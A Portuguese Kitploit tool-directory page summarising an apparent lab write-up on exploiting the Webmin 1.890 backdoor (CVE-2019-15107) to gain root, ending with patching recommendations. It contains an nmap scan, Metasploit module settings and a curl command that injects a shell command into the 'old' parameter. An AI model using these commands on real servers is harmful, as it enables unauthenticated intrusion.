Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — Objectivo da Investigação: Realizar uma análise abrangente e exploração bem-sucedida de uma vulnerabilidade de Execução Remota de Código (RCE) no Webmin versão 1.890 (CVE-2019-15107), obtendo, em última análise, controlo total sobre o sistema alvo. | Kitploit
Ferramentas/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

Objectivo da Investigação: Realizar uma análise abrangente e exploração bem-sucedida de uma vulnerabilidade de Execução Remota de Código (RCE) no Webmin versão 1.890 (CVE-2019-15107), obtendo, em última análise, controlo total sobre o sistema alvo.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Objetivo da Pesquisa: Realizar uma análise abrangente e exploração bem-sucedida de uma vulnerabilidade de Execução Remota de Código (RCE) no Webmin versão 1.890 (CVE-2019-15107), obtendo controle total sobre o sistema alvo.

Metodologia:

Reconhecimento Inicial:

Varredura de rede realizada com Nmap:

bash nmap -sV -sC -A -p- 10.201.105.185 Identificado serviço Webmin 1.890 rodando na porta 10000

Análise de Vulnerabilidade:

Investigado o mecanismo da vulnerabilidade em password_change.cgi

Confirmada a possibilidade de execução arbitrária de comandos sem autenticação

Exploração:

Implementados dois vetores de ataque:

Usando o Metasploit Framework:

bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit Exploração manual via curl:

bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" Pós-Exploração:

Obtido shell interativo como root

Conduzida análise do sistema de arquivos

Descobertos arquivos de flag:

bash /home/dark/user.txt /root/root.txt Descobertas:

Vulnerabilidade CVE-2019-15107 explorada com sucesso

Obtidos privilégios completos de root no sistema

Demonstrada a importância crítica de atualizações de software em tempo hábil

Conclusões Técnicas:

A vulnerabilidade permite execução arbitrária de comandos via injeção no parâmetro "old"

A ausência de verificações de autenticação torna isso particularmente perigoso

A versão 1.890 contém uma backdoor corrigida em versões posteriores

Recomendações de Segurança:

Atualização imediata para a versão atual do Webmin

Restringir acesso ao painel de gerenciamento por IP

Auditorias regulares de segurança em aplicações web

Direções para Pesquisas Futuras:

Análise de outras vulnerabilidades do Webmin

Desenvolvimento de exploit personalizado sem Metasploit

Investigação de técnicas de persistência em sistemas comprometidos

Este estudo de caso demonstra a importância crítica de atualizações oportunas no sistema e a necessidade de monitoramento contínuo de vulnerabilidades em software implantado. A pesquisa fornece insights práticos sobre técnicas modernas de exploração de aplicações web, ao mesmo tempo em que enfatiza princípios fundamentais de segurança.

Baixar ferramenta